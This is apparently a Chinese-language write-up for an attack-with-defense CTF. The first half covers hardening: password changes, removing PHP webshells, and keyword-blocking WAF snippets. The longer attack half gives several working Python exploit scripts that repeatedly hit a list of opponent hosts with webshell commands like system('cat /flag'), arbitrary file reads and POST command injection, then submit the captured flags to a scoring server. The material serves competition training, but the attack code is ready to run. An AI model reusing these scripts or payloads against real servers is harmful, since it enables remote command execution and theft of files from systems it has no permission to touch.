一、防御
1、改用户密码
passwd <user>
2、改数据库密码
进入数据库
mysql -uroot -proot
改密码
update mysql.user set password=password('新密码') where user='root';
查看用户信息密码
select host,user,password from mysql.user;
改配置文件,将密码改为自己修改后的密码(不更改的话会宕机)
3、删除匿名用户(默认会存在匿名用户登录(user为空的用户))
delete from mysql.user where user='';
4、刷新mysql
flush privileges;
5、处理一句话木马
用d盾扫描
/app/.a.php
一句话木马
法一:直接删除这个文件
rm -r .a.php
法二:写入空白
echo > .a.php
法三:注释
/app/a.php
一句话木马+打印出包含有关服务器和执行环境的信息
处理方法同/app/.a.app
/app/config.php
注释
/app/index.php
注释
6、任意文件读取漏洞
/app/about.php
结合自己的网页尝试看看也方便后面攻击
法一:注释(这里不是功能点直接注释就行)
法二:写waf(以防注释到功能点)
<?php
// 定义要限制的特定字符
$restricted_chars = array("flag");// 检查 GET数据
function check_input($data) {global $restricted_chars;foreach ($restricted_chars as $char) {if (strpos($data, $char) !== false) {// 如果输入包含限制字符,则触发防火墙动作block_request();}}return $data;
}// 阻止请求的函数
function block_request() {http_response_code(403); // 返回 403 禁止访问状态码die("Forbidden"); // 终止脚本执行
}// 检查 GET 数据
foreach ($_GET as $key => $value) {$_GET[$key] = check_input($value);
}
?>将文件上传至app目录
注:这里的waf文件名不能为中文否则不被识别
/app/contact.php
处理方法同/app/about.php
7、 命令执行漏洞
/app/footer.php
POST请求命令
法一:注释
法二:waf
<?php
// 定义要限制的特定字符
$restricted_chars = array("cat","flag","ls");// 检查 GET、POST 和 COOKIE 数据
function check_input($data) {global $restricted_chars;foreach ($restricted_chars as $char) {if (strpos($data, $char) !== false) {// 如果输入包含限制字符,则触发防火墙动作block_request();}}return $data;
}// 阻止请求的函数
function block_request() {http_response_code(403); // 返回 403 禁止访问状态码die("Forbidden"); // 终止脚本执行
}// 检查 POST 数据
foreach ($_POST as $key => $value) {$_POST[$key] = check_input($value);
}
?>
/app/admin/footer.php
处理同/app/footer.php
/app/admin/header.php
GET请求命令
法一:注释
法二:写waf
<?php
// 定义要限制的特定字符
$restricted_chars = array("cat","flag","ls");// 检查 GET、POST 和 COOKIE 数据
function check_input($data) {global $restricted_chars;foreach ($restricted_chars as $char) {if (strpos($data, $char) !== false) {// 如果输入包含限制字符,则触发防火墙动作block_request();}}return $data;
}// 阻止请求的函数
function block_request() {http_response_code(403); // 返回 403 禁止访问状态码die("Forbidden"); // 终止脚本执行
}// 检查 GET 数据
foreach ($_GET as $key => $value) {$_GET[$key] = check_input($value);
}
?>
8、sql注入
/app/search.php
法一:用sqlmap扫描,可以发现注入点(有union注入,布尔盲注,时间盲注和)
法二:手注测试(比较菜只测出了布尔盲注)
true页面
false页面
上waf
/app/login.php
9、修改后台登入密码
先用navicat连上自己的数据库
注意端口是3306不要被mysql_port误导了
连上后进入admin表改后台密码
10、信息泄露
登入后台发现直接得到flag
查看/app/admin/index.php,发现有段php代码进行命令执行
直接注释
11、文件上传漏洞
登入后台后会发现一个文件上传
上传一个文件
/app/admin/upload.php
部署一个文件上传监测脚本
二、攻击
1、扫web端口
nmap <ip> -p <范围>
2、连数据库
尝试看看能不能用navicat直接无密码连接上数据库(如果数据库密码没改的话)
3、后门
/app/.a.php
写自动化exp
import requests
import time
import schedule
import ospayload ="?c=system('cat /flag');"
page=".a.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第一行行内容choice_line = lines[0]with open('hm_flag1.txt', 'a', encoding='utf-8') as file:file.write(choice_line+'\n')def support_flag():with open('hm_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('hm_flag1.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/a.php
import requests
import time
import schedule
import ospayload ="?c=system('cat /flag');"
page="a.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第一行行内容choice_line = lines[0]# 删除多余内容comment = "<pre class='xdebug-var-dump' dir='ltr'>"cleaned_line = choice_line.replace(comment, "")with open('hm_flag2.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('hm_flag2.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('hm_flag2.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/config.php
同/app/.a.php
/app/index.php
同/app/a.php,改为第83行,改删<!-- banner -->
4、任意文件读取漏洞
/app/about.php
import requests
import time
import schedule
import ospayload ="?file=/flag"
page="about.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]# 删除多余内容comment = "<!-- banner -->"cleaned_line = choice_line.replace(comment, "")with open('ry_flag1.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('ry_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('ry_flag1.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/contact.php
import requests
import time
import schedule
import ospayload ="?path=/flag"
page="contact.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第83行行内容choice_line = lines[82]# 删除多余内容comment = "<!-- banner -->"cleaned_line = choice_line.replace(comment, "")with open('ry_flag2.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('ry_flag2.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('ry_flag2.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
5、命令执行
/app/footer.php
import requests
import time
import schedule
import ospage="footer.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page# print(n_url)data = {"shell":"cat /flag"}response = requests.post(url=n_url,data=data)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]with open('rce_flag1.txt', 'a', encoding='utf-8') as file:file.write(choice_line+'\n')def support_flag():with open('rce_flag1.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('rce_flag1.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
/app/admin/footer.php
同/app/admin/footer.php
/app/admin/header.php
import requests
import time
import schedule
import ospayload ="?p=cat%20/flag"
page="admin/header.php"
urls = ['http://172.16.17.202:10250/','http://172.16.17.202:10298/','http://172.16.17.202:10869/','http://172.16.17.202:12186/','http://172.16.17.202:12232/','http://172.16.17.202:12750/','http://172.16.17.202:14219/','http://172.16.17.202:15054/','http://172.16.17.202:16767/','http://172.16.17.202:17365/','http://172.16.17.202:18922/',]def get_flag():for url in urls:n_url = url + page + payload# print(n_url)response = requests.get(url=n_url)if response.status_code == 200:# 获取源代码中的所有文本内容,并按行拆分lines = response.text.split('\n')# 获取第1行行内容choice_line = lines[0]# 删除多余内容comments = ["cat /flag<pre class='xdebug-var-dump' dir='ltr'><small>string</small> <font color='#cc0000'>'","'</font> <i>(length=32)</i>"]cleaned_line = choice_linefor comment in comments:cleaned_line = cleaned_line.replace(comment, "")for comment in comments:cleaned_line = cleaned_line.replace(comment, "")with open('rce_flag3.txt', 'a', encoding='utf-8') as file:file.write(cleaned_line+'\n')def support_flag():with open('rce_flag3.txt', 'r', encoding='utf-8') as file:content = file.read()# print(content)for line in content.split('\n'):# print(line)url = 'http://172.16.17.202:9090/'data = {"flag": line,"token": "4300f7f61934925694f6138f3045e61e"}response = requests.post(url, data=data)# print(response.text)time.sleep(1)# 提交完所有 flag 后删除文件os.remove('rce_flag3.txt')def job():#添加全局变量,跟踪是否是第一次执行任务global first_runget_flag()support_flag()print(time.strftime("%Y-%m-%d %H:%M:%S"))if first_run:#每五分钟执行一次schedule.every(5).minutes.do(job)first_run = Falseif __name__ == '__main__':first_run = Truejob()while True:schedule.run_pending()time.sleep(1)
![[C++]ecplise C++新建项目跑hello world](https://i-blog.csdnimg.cn/direct/726443098f9a4513b28de3a871ab1aa9.png)
![[Linux网络编程]03-TCP协议](https://i-blog.csdnimg.cn/direct/447aa288cc38493083b09a9b038ad869.png)
